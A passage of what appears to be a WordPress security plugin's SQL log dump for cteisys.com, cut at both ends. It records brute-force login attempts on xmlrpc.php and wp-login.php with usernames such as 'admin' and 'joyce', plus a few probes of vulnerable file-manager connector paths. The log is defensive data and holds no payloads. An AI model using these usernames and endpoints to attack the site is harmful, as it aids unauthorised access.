'178.128.209.28',2994786588,'newd',0,1664034753.1170,152,'hit95AenGP2c8Z1KTumDRJ3r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.29.249',2112036345,'newd',0,1664035317.9743,152,'VdeQRj2BaknI4LOJSyH7uG3K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.199.237',2673461229,'newd',0,1664035384.5268,7,'fOmYrc9pNX58GJyat7sS0nHW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.27.238.234',1729883882,'newd',0,1664035983.2461,152,'YldvP2iRp5oyWEL97HNwcrmU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.230.202.147',1877396115,'newd',0,1664036456.9494,7,'L9y7Qeh8H0RWlVMO6NvnjzqY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.46.121.66',3106830658,'newd',0,1664036911.1421,152,'cfdAWqEseN3vB9VTORoruwZY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.35.64.73',1730363465,'newd',0,1664037286.4519,152,'AYyVb0xiMkRCfJqZTsj7P9FX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.120.69.121',762856825,'newd',0,1664037491.7645,7,'bQnjXI7ef2LMPrkCBNz9DpE6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.189.112.27',3116199963,'joyce',0,1664037551.5400,152,'rScEQtsBXDpmLl9jqYAd576z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.61.228',3165011428,'newd',0,1664037920.5961,7,'q0Fsr81HTBzcQRGEundXMZ7b','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('154.0.165.146',2583733650,'admin',0,1664038158.8196,152,'Eq6N8JRk5CuKmXcQhlnaLgoD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.165',3583549861,'joyce',0,1664038314.4784,152,'OfVtdbg2hr1oGDzaZc6IP84w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'admin',0,1664038565.0928,152,'VXrA9aPlQxRsmZgHT68wjOY3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.65.213.168',1296160168,'newd',0,1664038735.5101,7,'ghyIdfr48WYHcq2E7wnXk9AG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.152.164.103',1738056807,'admin',0,1664038827.0566,152,'6UIK4z5eHFSmXJ1dac7DnyV3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'admin',0,1664039197.8494,152,'MxljAXUiWdT95yvkY7mQEHbz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.203.137',2733755273,'admin',0,1664039457.7360,152,'lygWvoj08p7OHhqZsFct5YfD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.114.72.18',796018706,'newd',0,1664039462.4196,7,'SjBNfWCOx5pkLZtRe0wrlGdy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.95.109.187',2522836411,'admin',0,1664039778.1415,152,'fy8xPkQFElrARJeNwctIsnLp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.175.111.233',1806659561,'newd',0,1664040263.9664,7,'nr5qQZLBMIt2ylm34zaEAu96','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.209.28',2994786588,'admin',0,1664040541.4616,152,'eHs8b0jlW2ZkMQdEgXnJtq57','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.222.243.149',1038021525,'admin',0,1664040846.5736,152,'1D2tuX50I38bBpw7kUW6H4ar','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.52.120.186',1781823674,'newd',0,1664040990.8355,7,'HZ7jvtEwVMI8xmCLJNPKGAq6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.92.159.48',3193741104,'admin',0,1664041072.3291,152,'Z3YhsV7Nv5I6lteT0kqnDcP8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.110.137',1556967049,'admin',0,1664041386.7369,152,'e4dV5tGLjau0iSPoBCJzx8FY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'admin',0,1664041586.3923,152,'VF36xUfkeBpIl7uLn1AzwC8Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.236.35',3165056035,'newd',0,1664041804.5994,7,'jOWrSdlhvw3Gk4pJegst82co','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('83.143.116.3',1401910275,'admin',0,1664042065.3166,152,'AmE73l8KO9VkW0oPZ1vfFhGc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.31.171',2680889259,'admin',0,1664042352.8123,152,'aJqGstQkFzDTlEv3R6jO9i5y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.36.190',3515688126,'Joyce',0,1664042478.4285,51,'4pH0hYW1FibX5829saCkDtZ7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.33',3103917089,'newd',0,1664042524.0836,7,'XAmZeUiV4r7wIPlLpuRGWjbv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.43.127.191',1697349567,'admin',0,1664042540.1351,152,'d48IGejwQPDlHVXYzgWknpK0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.136.33',867338273,'admin',0,1664042829.9538,152,'SQkNbG8KlrsUYRCPMFDh3ZAg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.223',1364735199,'admin',0,1664043028.7157,152,'5iRq0zN7aVQHwX9CSWDcxmd2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.126.223.177',2424233905,'newd',0,1664043317.3824,7,'2Us9Z7oJzKRe5cxqL14AQtGB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('163.172.110.175',2745986735,'admin',0,1664043514.7427,152,'IZmCG9FRkHdVvbgzAj20WXre','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'admin',0,1664043795.9839,152,'Pa7A2U0IsjRJoOCtcBrdEGYL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'admin',0,1664044006.0471,152,'VxXOQoeIdPw4KHUpfu09rcvF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1664044024.5416,7,'PzkADEFbwOaJqH47h3XM95BN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.79.8.125',2018445437,'admin',0,1664044267.4892,152,'RiES2f5ncGI8yKJ1F69xAle4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.205.115',2160577907,'admin',0,1664044467.2117,152,'MOxKw7aiGmWPLHsBdpXC20tS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.75.65.218',575357402,'newd',0,1664044807.3881,7,'PAX56vOKQJIH0RSimfzBGWYN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.180.247.212',1807022036,'admin',0,1664045218.0879,152,'2sThbMrAQf91NZVqutkBxI4y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.153.214.231',1738135271,'admin',0,1664045395.6675,152,'7TBhfNGA5L2gzH4CUsQXwVE9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1664045500.2340,7,'NeBSMQV2tbd3RAX8T6rgy74O','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.57.247.254',3325687806,'admin',0,1664045700.5545,152,'JtpioYeZKTN5zVglBEQby4CG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.100.231',2707514599,'admin',0,1664045865.2149,152,'DIJ1sLHxSKNbXEVeWYRoMQ7T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'admin',0,1664046128.9224,152,'UcBj39FEwymRC4Vxs0AJ7tf2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.182.249.22',2478242070,'newd',0,1664046273.2622,7,'zuGKfZPAcdxDR67MThBpX2E1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.193.197.89',599901529,'admin',0,1664046784.6982,152,'e78JuDO4bTrWwERojmcnC6tA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.128.173.10',2323688714,'admin',0,1664047051.6600,152,'tIxGbDz8mB2YjFuC4Kp3ec6T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.197.195.173',3116745645,'admin',0,1664047263.8485,152,'zHmM6bjULyZqRlh7TntXrdp8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'admin',0,1664047524.4720,152,'nHkc6e90KFGUWuMRytgbhQAX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.221.35',3091979555,'joyce',0,1664047707.4533,152,'2vTV8KQSpwC6IEOa13oRsWnD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'admin',0,1664047729.4714,152,'IxCYLT6WyQGb57nJjqlNiarh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'Joyce',0,1664048120.2167,51,'69X4xfEavsFb3HZiNRCU0BVO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.158.12.149',2090732693,'admin',0,1664048184.0469,152,'JnlUwfd5K14NTsELQBOo7rD3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.79.17.158',223285662,'newd',0,1664048469.3582,7,'4IEjnhCK9ygliuMpFxc8BvAO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.38.80.81',858148945,'admin',0,1664048473.0250,152,'g1Hv5J08iabWS2ecdUfw9tXk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.18.75',1386549835,'admin',0,1664048659.1309,152,'IG7W9dzMguFQcHihotZwpyPU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.159.35',3265503011,'admin',0,1664049149.9165,152,'zWEgxdsDc1Cint3TBPhAubQ7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.27.240.230',2015097062,'newd',0,1664049252.9913,7,'OTaWosymv8NCpISJE7PhQRcG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.210.196.65',3235038273,'admin',0,1664049622.7303,152,'npMYLd78toZlAsgBCbDHUy6N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.24.78',2522814542,'admin',0,1664049933.5693,152,'KbqMvhk0epjc1nZ25xiyLXWH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.34.14',1218912782,'newd',0,1664049970.0324,7,'RwSgeqNlF6Wo1EcB8kCdzXix','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('50.87.216.226',844617954,'admin',0,1664050132.0941,152,'9H3Im7ui8UTMGpzo4gKVNdfR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('2.184.67.138',45630346,'admin',0,1664050457.9179,152,'srlcKy7J8BWLzRXEtPFIo52n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'admin',0,1664050636.4964,152,'qb7tu6U8MIpvS9O1PJLzl50y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.120.69.121',762856825,'newd',0,1664050778.9075,7,'TkmG6Pz50h7sZEDKvJ8f1t9c','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.145.68.131',3197191299,'admin',0,1664051145.1096,152,'po97Olv6FreIjQ1VCtNsBZmi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.201.215.19',1539954451,'admin',0,1664051478.0424,152,'uWqcQmRF36gkNMXEajTA40bd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.247.170',2371811242,'newd',0,1664051507.5327,7,'Ces1aMXdGSRc7jvgJN823P0f','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.154.177.165',1738191269,'admin',0,1664051666.7413,152,'Ooet0KTxbuzvWkw5P3ns4HiG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.165.118.130',3114628738,'admin',0,1664052212.8987,152,'dTIvNB1Dr2mQUoc9EJ5znXhK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.38.73.235',908478955,'newd',0,1664052315.2422,7,'nK5WmwGDjHBc8b7lSpMCJQEZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.217.226.56',2094654008,'admin',0,1664052500.5139,152,'HDU6PjWu0dyM5zrlkaLhAfc3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1664053038.4147,7,'HSyWqiOZAwzfh8cTKBjUFpr5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.180.247.212',1807022036,'admin',0,1664053054.4445,152,'ZsunqImcCf2d6iHWU75a8R3E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.107.137.177',661359025,'admin',0,1664053836.8089,152,'hAxJrBXugDiwaGCtIvl7Z6Sy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.192.91',858177627,'newd',0,1664053840.5196,7,'84p9MfzZh7wXKPgrcBl2NJub','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.92.159.48',3193741104,'admin',0,1664054143.8131,152,'c2v3NEkdrhaDpXsHQqWRBotO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.194.243',2769732339,'admin',0,1664054355.0162,152,'E2o4bPi83UeNh7kIaWGTVXBY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1664054566.9902,7,'UClHNy2ExP95uBKc0MhGeotf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('130.61.143.194',2185072578,'admin',0,1664054921.0509,152,'08XWvwBilbFy1oPsxNn7IzeM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.213.170.208',601205456,'admin',0,1664055236.6704,152,'uosYSOCrfRdgKPGIyFNA5mnq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.171.103',3497110375,'newd',0,1664055373.8314,7,'85pdmnJFb6xoz2Q7rsw0Ai4Y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.166.182.177',1738978993,'admin',0,1664055463.2218,152,'dwZ1sgYGHIByqW8R0MO5Cxol','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.197.195.173',3116745645,'admin',0,1664055816.9516,152,'d2WzCPitNkph4ylATRJY50Ef','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.197.195.173',3116745645,'admin',0,1664056051.4541,152,'ORUlcx4vpS9J32YDwj6Ih7yb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.212.236.252',1490349308,'newd',0,1664056099.5907,7,'Nk9Syt6hosTG8LD0K5jPdXxi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.186.19',3583556115,'joyce',0,1664056501.5796,152,'kM5HxZEumDWzROUv6SVAiqno','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.145.68.131',3197191299,'admin',0,1664056638.4757,152,'8XwAjfLc2D5auqSUYg9oe0JW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.195.148.190',868455614,'newd',0,1664056907.9963,7,'ockP4LVHCQaq0luxEh9vrIs3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.76.135.117',223119221,'admin',0,1664056978.9812,152,'wbIUBxLTmZtcA97znhS4Ks8G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'admin',0,1664057224.5157,152,'3sQPNUjq9tBvxDom6S8A0zga','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.17.110',2884899182,'admin',0,1664057579.4651,152,'gSNHAz5Y9CJPBqRXcDv4GK0n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.217.190.82',3000614482,'newd',0,1664057637.2943,7,'AXEH6VOgqimlL4ZMjSdQPRNs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('122.17.148.164',2047972516,'admin',0,1664057822.1923,152,'uX3UH4esD1TqQz5Zrmwfl8nM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.168.187',267102395,'admin',0,1664058194.4734,152,'L0Wdl3xIkgZapfUvCiGnVSDA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.104.173',2994759853,'admin',0,1664058423.8500,152,'rFwQ3kZLPBJIXnGDtfcd8joO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.182.249.22',2478242070,'newd',0,1664058441.7074,7,'iHjUqvGAtMayDEhVKP8SNrOF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.230.247.143',2531719055,'admin',0,1664058803.1532,152,'o5nS4UxEK1LwX3Oyk6W7NAZb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.136.33',867338273,'admin',0,1664059030.9348,152,'VYhrHzsGD8eK6LlkAFXdSypQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.192.91',858177627,'newd',0,1664059163.3331,7,'njVaOT4gxlsQZNWcim7koBz2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.211',3091980243,'joyce',0,1664059763.3803,152,'f1saSJ9GXOWcCVPMKtZvmbud','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.15.183.168',856668072,'',0,1664059830.5183,55,'JkWm0QiovPI3CzwtAcbqnZKe','','19|0|0|0|cteisys.com/js/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('23.99.229.218',392422874,'newd',0,1664059970.9582,7,'D9iWZ7lheqRTQIn1pHmowxOX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.79.144.41',860852265,'admin',0,1664060001.2725,152,'N4SAqkHgVLEpFBoayu1P0Wi5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.76.135.117',223119221,'admin',0,1664060234.1757,152,'kodiu3fKe0smUPahAL2BE71S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.130.103.36',2239915812,'newd',0,1664060698.4763,7,'IvOCuiK6ngwGe1qQFZDsrdcH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.210.196.65',3235038273,'newd',0,1664060858.6638,152,'8Dpj3JTlaRzGiBqWekrgImt7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.223.203',3091980235,'joyce',0,1664061193.6901,152,'36EqTCcIgk0ydWoKM78XpxOZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.23.254.254',1125646078,'newd',0,1664061221.2092,152,'250ZCgl6N4YvRckWbiEaQh9r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1664061465.8988,152,'5GxEkMHLVR732trmqNTDK4Xz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.129.222.91',1736564315,'newd',0,1664061508.4863,7,'Gmkbn8Csag2hfLrp7DUXVylS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.46.121.66',3106830658,'newd',0,1664061841.7381,152,'6L5EZS1cax74r0bqQ98DhiIU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1664062077.4538,152,'IC6AZlsT9b0OK3izPyck5jvh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.115.24.165',796072101,'newd',0,1664062232.8166,7,'QGiAlpL0XsTyx9rwhPYFjDS5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.0.73.142',1694517646,'newd',0,1664062698.4452,152,'wD4vEhWQuIsizRG0TbHV8Lx1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.75.65.218',575357402,'newd',0,1664063038.8937,7,'LtTU78vI32uYWspdBF4RzGky','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.107.177.243',3194728947,'newd',0,1664063062.1687,152,'ShmcPV6pv94ewgDWaMNyCRnL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1664063329.7166,152,'HwaYi2yjfCv57uBPDGMgelnI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.78.47.249',2471374841,'',0,1664063664.4780,55,'PDx8S7buf5Wl0FQ9mr2pByTX','','19|0|0|0|cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('202.21.38.119',3390383735,'newd',0,1664063764.4691,7,'VuDILypJxqGXWKYNo3ASCE21','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.118.238',2335930094,'newd',0,1664064579.5624,7,'aAZcseQfztpx9S8mGuWYEqik','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('106.14.141.22',1779338518,'newd',0,1664064585.1140,152,'0YlQxRwoTgu7B5IimynOSzc3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.57.186.73',792312393,'newd',0,1664064970.6987,152,'nis1uZ9lYXUdB7Iv0ytFAKHC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.56.26.54',2503481910,'newd',0,1664065309.6328,7,'XW3CEgjSLJO5mD0hqrxnFBfw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1664065608.6821,152,'5i2MHuy3C1OBNrKondltjgvQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.163.194.31',3231957535,'newd',0,1664065844.1983,152,'cYX0C75h8FODIRisSMakbpQj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1664066125.2872,7,'q2tnQgETs6wUYSLa4B9cVfZX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.107.158.16',3245055504,'newd',0,1664066221.3841,152,'aRi6BhO4GrzPY8Zme1V2Akvn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.17.110',2884899182,'newd',0,1664066480.4734,152,'2yeY4lIJgzvAjoVwWcHa5CPR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.187.58.136',599472776,'newd',0,1664066855.0528,7,'XcMCv9QVhlJD1pm5YRzSr3sy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('154.0.165.146',2583733650,'newd',0,1664067127.5497,152,'VWuhxN3ZXpRiY85DeIdKfHO0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.79.239.127',1632628607,'newd',0,1664067501.6506,152,'vqQZxEkYsJ50p1iOWCP2Ae3a','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.120.246',2680912118,'newd',0,1664067666.7546,7,'3uEjOTQK61NJYroBdGXxR9Li','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664067754.6750,152,'EhlsoTpVN68CeB9UQOiHdgar','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1664068167.9594,152,'6Wk1AQ2Yvwtanl8jJ9pPmTF7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.86.247',1152866039,'newd',0,1664068408.6964,7,'1uURvTj6VtNnGsZpc357Abgd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.251.219.111',1358682991,'newd',0,1664068415.9333,152,'LrKNwlpEISU2gFTe5J187kvo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.132.201.19',1921304851,'newd',0,1664068777.2536,152,'PmU1pqND0wFlOc2gnR5BiACs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.211.236',2733691884,'newd',0,1664069054.1216,152,'Pox9rYNaJpR4TD2kIig7Gh3t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('110.40.244.196',1848177860,'newd',0,1664069217.6972,7,'SYgtes9uT30L4Ef5hAbJjwkd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1664069421.1069,152,'n4CYw3UOqpiVy8NIH2EsDkKJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.152',1046910104,'joyce',0,1664069469.7402,152,'SdP9VaKGJ5MFRUbi67m48BTY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.227.251.154',1139014554,'newd',0,1664070075.9657,152,'Q6wdVJjgbcSL5OoDsuPMytmB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1664070347.6919,152,'eQl4W2pvKAR78cXZ0FCHGwMk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.171.244.176',3098277040,'newd',0,1664070731.6999,152,'Dx7HVvjWfNY64G8ipdIruX5a','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1664070757.5370,7,'YSKwzH30QUmXVPcIDxkqgNvL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1664071005.6668,152,'DtMHuo1rjnwBySEdX98cm5lb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.187.58.136',599472776,'newd',0,1664071509.9397,7,'hHydB7tg2l1TGMmkr0snzYaQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.145.54.196',3515954884,'newd',0,1664071646.1955,152,'gEUHnFJu7sBq2XCcx3YV9mpQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.118.155.133',3413547909,'newd',0,1664072028.4279,152,'vp39dQjWJqGt7IkEO0cN8fne','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.188.207.230',3351039974,'newd',0,1664072303.5571,152,'XcV7YAqjLH85UyRtph9OZo3E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.109.148.216',2523763928,'newd',0,1664072316.4190,7,'SvdVnFUgpwrfysEubRW4Ni6l','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.203',2249438155,'joyce',0,1664072477.2163,152,'34Is2zVByoJGF51Rj7SYpxiM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.85.224',2335921632,'newd',0,1664073065.0528,7,'X4zdEeTS5Gy8NtrKHcjiDR07','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.210.99.98',869426018,'newd',0,1664073636.7885,152,'wW9nR4NHMLxFeIUP0dZOYtAX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.15.38.206',1779377870,'newd',0,1664073867.1278,7,'8iKHZdXRJbfGMqD7jeAUS6o2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('172.104.81.115',2892517747,'newd',0,1664074006.7283,152,'0HmbX1EnChisdFTk3l6cVtqA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1664074274.6793,152,'smxRPLlpi4DGCfhg0KdbAZ3W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.121.12',2680912140,'newd',0,1664074600.9994,7,'ePjiR2CbQlrBVkKvsd0GatFA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.75.15.189',860557245,'newd',0,1664075436.7626,7,'IBiF0WQyHNeDxqn65MSuUTVo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1664075595.5120,152,'65Uzi19eyldOnhVPBEuMrcT3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.173.161.171',1605214635,'newd',0,1664075967.0977,152,'6doO41pBZg3UiykhWMIYeb9K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.41.221.5',1747574021,'newd',0,1664076147.9326,7,'UlezD782yNELhgQPS6FxinRs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.69.10',3270067466,'newd',0,1664076229.1672,152,'9ofzMdKURuJ7wmWtP4HV6NeD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.21.38.119',3390383735,'newd',0,1664076980.3924,7,'nYbCZV18ktgufB4SWwDMKP7J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.249',3583549945,'joyce',0,1664077650.8511,152,'2Zl1LcE3f7VzNPJpaR58ikMI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.211.193',3139490753,'newd',0,1664077700.6281,7,'7h9kafinzu6Xdb5KySrvCItL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.35.126.102',2703457894,'newd',0,1664078527.2816,7,'xOl7NPX9nwHbVIdf5zRsAJiB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('94.231.86.20',1592219156,'newd',0,1664079260.3641,7,'OxEeijtFzT4GRJLwslHrU703','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1664080078.3917,7,'BEYcOq5a4SJ7AZ3XuF6rPm82','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1664080814.2729,7,'DKAMmT1VF3tWeJqpHBsyizZa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.194',2487801538,'newd',0,1664081649.0855,7,'gYtwaqn7mQeF9CJ2A4DfW1EU','','0|0|0|0